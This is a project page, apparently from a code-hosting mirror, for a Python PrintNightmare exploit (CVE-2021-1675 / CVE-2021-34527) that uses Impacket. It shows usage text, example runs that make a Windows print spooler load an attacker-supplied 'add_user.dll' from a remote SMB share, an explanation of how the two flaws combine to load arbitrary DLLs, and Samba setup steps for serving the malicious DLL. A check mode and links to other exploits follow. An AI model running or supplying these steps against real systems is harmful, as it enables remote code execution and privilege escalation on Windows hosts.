Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527) using standard Impacket.

Overview

PrintNightmare

Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527) using standard Impacket.

Installtion

$ pip3 install impacket

Usage

Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

usage: printnightmare.py [-h] [-debug] [-port [destination port]] [-target-ip ip address] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address]
                         [-name driver name] [-env driver name] [-path driver path] [-dll driver dll] [-check] [-list] [-delete]
                         target

PrintNightmare (CVE-2021-1675 / CVE-2021-34527)

positional arguments:
  target                [[domain/]username[:password]@]
   
    

optional arguments:
  -h, --help            show this help message and exit
  -debug                Turn DEBUG output ON
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials
                        cannot be found, it will use the ones specified in the command line
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter

connection:
  -port [destination port]
                        Destination port to connect to MS-RPRN named pipe
  -target-ip ip address
                        IP Address of the target machine. If ommited it will use whatever was specified as target. This is useful when target is the
                        NetBIOS name and you cannot resolve it

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH

driver:
  -name driver name     Name for driver
  -env driver name      Environment for driver
  -path driver path     Driver path for driver
  -dll driver dll       Path to DLL

modes:
  -check                Check if target is vulnerable
  -list                 List existing printer drivers
  -delete               Deletes printer driver

   

Examples

Exploitation

Remote DLL
$ ./printnightmare.py -dll '\\172.16.19.1\smb\add_user.dll' 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Enumerating printer drivers
[*] Driver name: 'Microsoft XPS Document Writer v5'
[*] Driver path: 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_18b0d38ddfaee729\\Amd64\\UNIDRV.DLL'
[*] DLL path: '\\\\172.16.19.1\\smb\\add_user.dll'
[*] Copying over DLL
[*] Successfully copied over DLL
[*] Trying to load DLL
[*] Successfully loaded DLL
Local DLL
$ ./printnightmare.py -dll 'C:\Windows\System32\spool\drivers\x64\3\old\1\add_user.dll' 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Enumerating printer drivers
[*] Driver name: 'Microsoft XPS Document Writer v5'
[*] Driver path: 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_18b0d38ddfaee729\\Amd64\\UNIDRV.DLL'
[*] DLL path: 'C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\add_user.dll'
[*] Loading DLL
[*] Successfully loaded DLL

Notice that the local DLL example doesn't abuse CVE-2021-34527 to copy over the DLL.

Custom name
$ ./printnightmare.py -dll '\\172.16.19.1\smb\add_user.dll' -name 'My Printer Driver' 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Enumerating printer drivers
[*] Driver name: 'My Printer Driver'
[*] Driver path: 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_18b0d38ddfaee729\\Amd64\\UNIDRV.DLL'
[*] DLL path: '\\\\172.16.19.1\\smb\\add_user.dll'
[*] Copying over DLL
[*] Successfully copied over DLL
[*] Trying to load DLL
[*] Successfully loaded DLL

$ ./printnightmare.py -list 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Enumerating printer drivers
Name:               Microsoft XPS Document Writer v4
Environment:        Windows x64
Driver path:        C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\mxdwdrv.dll
Data file:          C:\Windows\System32\DriverStore\FileRepository\prnms001.inf_amd64_f340cb58fcd23202\MXDW.gpd
Config file:        C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_9bf7e0c26ba91f8b\Amd64\PrintConfig.dll
Version:            4
----------------------------------------------------------------
Name:               Microsoft Print To PDF
Environment:        Windows x64
Driver path:        C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\mxdwdrv.dll
Data file:          C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_80184dcbef6775bc\MPDW-PDC.xml
Config file:        C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_9bf7e0c26ba91f8b\Amd64\PrintConfig.dll
Version:            4
----------------------------------------------------------------
Name:               My Printer Driver
Environment:        Windows x64
Driver path:        C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL
Data file:          C:\Windows\system32\spool\DRIVERS\x64\3\add_user.dll
Config file:        C:\Windows\system32\spool\DRIVERS\x64\3\add_user.dll
Version:            3
----------------------------------------------------------------
Name:               Microsoft Shared Fax Driver
Environment:        Windows x64
Driver path:        C:\Windows\system32\spool\DRIVERS\x64\3\FXSDRV.DLL
Data file:          C:\Windows\system32\spool\DRIVERS\x64\3\FXSUI.DLL
Config file:        C:\Windows\system32\spool\DRIVERS\x64\3\FXSUI.DLL
Version:            3
----------------------------------------------------------------
Name:               Microsoft enhanced Point and Print compatibility driver
Environment:        Windows x64
Driver path:        C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdrv.dll
Data file:          C:\Windows\system32\spool\DRIVERS\x64\3\unishare.gpd
Config file:        C:\Windows\system32\spool\DRIVERS\x64\3\PrintConfig.dll
Version:            3
----------------------------------------------------------------

Check if target is vulnerable

Unpatched Windows 10
$ ./printnightmare.py -check 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Target appears to be vulnerable!
Patched Windows Server 2022
$ ./printnightmare.py -check 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[!] Target does not appear to be vulnerable

List current printer drivers

$ ./printnightmare.py -list 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Enumerating printer drivers
Name:               Microsoft XPS Document Writer v4
Environment:        Windows x64
Driver path:        C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_075615bee6f80a8d\Amd64\mxdwdrv.dll
Data file:          C:\Windows\System32\DriverStore\FileRepository\prnms001.inf_amd64_8bc7809b71930efc\MXDW.gpd
Config file:        C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_c9865835eff4a608\Amd64\PrintConfig.dll
Version:            4
----------------------------------------------------------------
Name:               Microsoft Print To PDF
Environment:        Windows x64
Driver path:        C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_075615bee6f80a8d\Amd64\mxdwdrv.dll
Data file:          C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_6dc3549941ff1a57\MPDW-PDC.xml
Config file:        C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_c9865835eff4a608\Amd64\PrintConfig.dll
Version:            4
----------------------------------------------------------------
Name:               Microsoft enhanced Point and Print compatibility driver
Environment:        Windows x64
Driver path:        C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdrv.dll
Data file:          C:\Windows\system32\spool\DRIVERS\x64\3\unishare.gpd
Config file:        C:\Windows\system32\spool\DRIVERS\x64\3\PrintConfig.dll
Version:            3
----------------------------------------------------------------

Delete printer driver

May require administrative privileges.

$ ./printnightmare.py -delete -name 'Microsoft XPS Document Writer v5' 'administrator:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Deleted printer driver!

Details

PrintNightmare consists of two CVE's, CVE-2021-1675 / CVE-2021-34527.

CVE-2021-1675

A non-administrative user is allowed to add a new printer driver. This vulnerability was fixed by only allowing administrators to add new printer drivers. A patched version of the print spooler will return RPC_E_ACCESS_DENIED (Code: 0x8001011b) if a non-administrator tries to add a new printer driver.

CVE-2021-34527

When adding a new printer driver, the pDataFile parameter in the DRIVER_CONTAINER allows UNC paths. The DLL specified in pDataFile will however not be loaded, but it will get copied over to a local path allowing us to create a new printer driver with the pConfigFile parameter pointing to the local path which will load the DLL. A patched version of the printer spooler will return ERROR_INVALID_PARAMETER (Code: 0x57)

Combining the pieces

Only CVE-2021-1675 is needed if the malicious DLL is already located on the target.

For PrintNightmare, if the DLL is not a local path, then CVE-2021-34527 can be used to fetch the DLL via UNC paths. For that reason, it is necessary to serve the DLL over SMB. If you're not familiar with SMB and UNC, read the following subsection.

When creating a new printer driver, the DLL in the pDataFile parameter will not be loaded for security reasons. However, it will be copied over to C:\Windows\system32\spool\drivers\x64\3\. Then, we could create a new printer driver that uses pConfigFile (which will load the DLL) with the local path. However, the DLL is in use by the first printer driver when creating the second printer driver. Instead, we could overwrite the first printer driver, which will make the printer driver's DLLs get copied over to C:\Windows\system32\spool\drivers\x64\3\old\\, where is incremented for each DLL. Now we can create a third printer driver that will use the local path C:\Windows\system32\spool\drivers\x64\3\old\\, since the DLL is no longer used. Now it's just a matter of guessing which will start incrementing from 1.

Note that the DLL will keep its filename locally, so if you initially run the exploit with foo.dll and it gets saved to C:\Windows\system32\spool\drivers\x64\3\old\1\foo.dll and you then change the contents of foo.dll locally and run the exploit again and it now gets saved to C:\Windows\system32\spool\drivers\x64\3\old\5\foo.dll, then the original foo.dll will be used since it is located in C:\Windows\system32\spool\drivers\x64\3\old\1\foo.dll. Instead, simply change the filename if you change the contents of the DLL.

SMB and UNC

In short, a UNC path is a path to a file or folder on a network rather than a local file, and it contains the server name and path. For instance, the UNC path \\10.0.0.2\files\foo.txt is a file foo.txt that is served from the files share of the server 10.0.0.2. Usually, a share is served over SMB, but WebDAV is also supported. To create an SMB share on Linux, the easiest and most reliable way is to use the Samba package.

To install Samba with apt:

$ sudo apt install samba

Edit the /etc/samba/smb.conf and add the following at the end of the file:

[smb]
    comment = Samba
    path = /tmp/share
    guest ok = yes
    read only = yes
    browsable = yes
    force user = nobody

This will create a new share called smb and serve the files inside /tmp/share. It allows for anonymous access, and the local user nobody will be used to browse the files.

Then start the Samba service by doing:

$ sudo service smbd start

Suppose your Linux machine has the IP 192.168.1.100 and you wish to serve the evil.dll, then the UNC path in this scenario will be \\192.168.1.100\smb\evil.dll.

Authors

Credits

You might also like...
CVE-2022-21907 - Windows HTTP协议栈远程代码执行漏洞 CVE-2022-21907

CVE-2022-21907 Description POC for CVE-2022-21907: Windows HTTP协议栈远程代码执行漏洞 creat

CVE-2022-22536 - SAP memory pipes(MPI) desynchronization vulnerability CVE-2022-22536

CVE-2022-22536 SAP memory pipes desynchronization vulnerability(MPI) CVE-2022-22

Cve-2022-23131 - Cve-2022-23131 zabbix-saml-bypass-exp
Cve-2022-23131 - Cve-2022-23131 zabbix-saml-bypass-exp

cve-2022-23131 cve-2022-23131 zabbix-saml-bypass-exp replace [zbx_signed_session

CVE-2022-22965 - CVE-2010-1622 redux

CVE-2022-22965 - vulnerable app and PoC Trial & error $ docker rm -f rce; docker build -t rce:latest . && docker run -d -p 8080:8080 --name rce rce:la

Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)
Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)

Pachine Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation). Installtion $ pip3 install impacket Usage Impacket v0.9.23 -

Generate malicious files using recently published homoglyphic-attack (CVE-2021-42694)

CVE-2021-42694 Generate malicious files using recently published homoglyph-attack vulnerability, which was discovered at least in C, C++, C#, Go, Pyth

Generate malicious files using recently published bidi-attack (CVE-2021-42574)
Generate malicious files using recently published bidi-attack (CVE-2021-42574)

CVE-2021-42574 - Code generator Generate malicious files using recently published bidi-attack vulnerability, which was discovered in Unicode Specifica

A script to search, scrape and scan for Apache Log4j CVE-2021-44228 affected files using Google dorks

Log4j dork scanner This is an auto script to search, scrape and scan for Apache Log4j CVE-2021-44228 affected files using Google dorks. Installation:

Fast python tool to test apache path traversal CVE-2021-41773 in a List of url

CVE-2021-41773 Fast python tool to test apache path traversal CVE-2021-41773 in a List of url Usage :- create a live urls file and use the flag "-l" p

Comments
  • rpc_s_access_denied

    rpc_s_access_denied

    While testing this on a larger domain, I received multiple error messages of type "rpc_s_access_denied" when using the -check functionality.

    I don't know enough Windows internals to understand the difference between this and "rpc_e_access_denied" but I suppose there is a pattern to this, which could be caught and cleanly reported, instead of just raising the error.

    opened by shaaati 0
  • Failed to bind: STATUS_OBJECT_NAME_NOT_FOUND

    Failed to bind: STATUS_OBJECT_NAME_NOT_FOUND

    Getting this error while testing the exploit. It has randomly stopped working on certain Windows Server 2012 hosts. From what I can see it may have something to do with MSRPN_UUID_RPRN.

    opened by VictorDamasio 0
Owner
Oliver Lyak
Security Researcher
Previously known as @ollypwn
Oliver Lyak
ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065)

ExProlog ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065) Usage: exprolog.py [OPTIONS] ExProlog -

Herwono W. Wijaya 130 Dec 15, 2022
an impacket-dependent script exploiting CVE-2019-1040

dcpwn an impacket-dependent script exploiting CVE-2019-1040, with code partly borrowed from those security researchers that I'd like to say thanks to.

QAX A-Team 71 Nov 30, 2022
Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user Known issues it will not work outside kali , i will update it

Hossam 867 Dec 22, 2022
Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

About Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user Changed from sam-the-admin. Usage SAM THE ADMIN CVE-202

Evi1cg 500 Jan 6, 2023
DCSync - DCSync Attack from Outside using Impacket

Adding DCSync Permissions Mostly copypasta from https://github.com/tothi/rbcd-at

n00py 77 Dec 16, 2022
DNSpooq - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685)

dnspooq DNSpooq PoC - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685) For educational purposes only Requirements Docker compo

Teppei Fukuda 80 Nov 28, 2022
ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF->GetWebShell)

ProxyLogon For Python3 ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF->GetWebShell) usage: python ProxyLogon.py --host=exchang

null 112 Dec 1, 2022
Exploiting CVE-2021-42278 and CVE-2021-42287

noPac Exploiting CVE-2021-42278 and CVE-2021-42287 原项目noPac在实现上可能有点问题,导致在本地没有打通,于是参考sam-the-admin项目进行修改。 使用 pip3 install -r requirements.txt # GetShel

W4ter 2 Jun 23, 2022
Details,PoC and patches for CVE-2021-45383 & CVE-2021-45384

CVE-2021-45383 & CVE-2021-45384 There are several network-layer vulnerabilities in the official server of Minecraft: Bedrock Edition (aka Bedrock Serv

null 20 Apr 7, 2022
聚合Github上已有的Poc或者Exp,CVE信息来自CVE官网。Auto Collect Poc Or CVE from Github by CVE ID.

PocOrExp in Github 聚合Github上已有的Poc或者Exp,CVE信息来自CVE官网 注意:只通过通用的CVE号聚合,因此对于MS17-010等Windows编号漏洞以及著名的有绰号的漏洞,还是自己检索一下比较好 Usage python3 exp.py -h usage: ex

null 567 Dec 30, 2022